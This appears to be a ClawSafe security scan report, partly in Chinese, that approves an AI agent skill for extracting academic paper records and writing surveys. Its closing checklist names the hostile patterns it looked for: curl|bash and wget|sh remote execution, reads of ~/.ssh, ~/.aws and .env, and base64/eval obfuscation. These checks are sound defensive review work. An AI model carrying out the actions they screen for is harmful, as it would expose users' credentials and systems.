paper-cluster-survey-v2-2 安全扫描报告 — 可信 | ClawSafe

5 /100

paper-cluster-survey-v2-2

Extract structured paper records from PDFs and URLs, then classify and write academic survey reviews

A legitimate academic paper extraction and survey generation skill with appropriate, documented capabilities and no malicious behavior detected.

技能名称paper-cluster-survey-v2-2

分析耗时38.4s

引擎pi

✓

可以安装

Approve for use. This skill performs standard paper metadata extraction from PDFs and URLs using well-defined, documented methods.

安全发现 1 项

严重性	安全发现	位置
低危	Shell tool usage not explicitly documented in SKILL.md The SKILL.md mentions bundled scripts for paper extraction but doesn't enumerate the specific external tools (pdftotext, mutool, python3+pypdf, strings) used for PDF text extraction. This is technically a documentation gap but not a security violation as the tools are standard, well-named utilities. `SKILL.md references 'scripts/extract-paper-records.mjs' without specifying PDF tool dependencies` → Consider adding a 'Tool Dependencies' section listing: pdftotext, mutool, python3 with pypdf module	`SKILL.md:68`

资源类型	声明权限	推断权限	状态	证据
文件系统	`READ`	`READ`	✓ 一致	scripts/extract-paper-records.mjs:179 reads local files via fs.readFileSync
网络访问	`READ`	`READ`	✓ 一致	scripts/extract-paper-records.mjs:247 uses native fetch() to retrieve paper URLs
命令执行	`WRITE`	`WRITE`	✓ 一致	scripts/extract-paper-records.mjs:194-225 invokes pdftotext, mutool, python3, st…

1 项发现

🔗

中危外部 URL 外部 URL

https://arxiv.org/abs/1234.5678

README.md:30

10 文件 · 37.6 KB · 1320 行

JavaScript 3f · 792L Markdown 6f · 522L YAML 1f · 6L

├─ ▾ 📁 agents

│ └─ 📋 openai.yaml YAML 6L · 360 B

├─ ▾ 📁 references

│ ├─ 📝 extraction-pipeline.md Markdown 48L · 1.4 KB

│ ├─ 📝 output-schema.md Markdown 107L · 1.8 KB

│ ├─ 📝 review-paper-style.md Markdown 81L · 2.1 KB

│ └─ 📝 taxonomy-guidelines.md Markdown 35L · 1.1 KB

├─ ▾ 📁 scripts

│ ├─ 📜 extract-paper-records.mjs JavaScript 492L · 14.3 KB

│ ├─ 📜 normalize-sources.mjs JavaScript 138L · 3.1 KB

│ └─ 📜 render-formal-review-template.mjs JavaScript 162L · 4.1 KB

├─ 📝 README.md Markdown 99L · 3.1 KB

└─ 📝 SKILL.md Markdown 152L · 6.1 KB

包名	版本	来源	已知漏洞	备注
`Node.js built-ins`	`N/A`	runtime	否	Uses only built-in modules: fs, os, path, process, child_process (spawnSync), fetch (native)

✓ No credential harvesting or environment variable enumeration

✓ No network exfiltration or data transmission to external servers beyond source URLs

✓ No access to sensitive paths (~/.ssh, ~/.aws, .env)

✓ No obfuscation techniques (base64, eval, atob)

✓ No remote script execution (curl|bash, wget|sh)

✓ No arbitrary shell command execution - only specific PDF extraction tools

✓ Uses only Node.js built-in modules, no external dependencies

✓ Shell commands are standard, well-known utilities (pdftotext, mutool, strings)

✓ All shell invocations are documented through bundled scripts reference

✓ Temporary PDF files are properly cleaned up after processing

✓ No privilege escalation attempts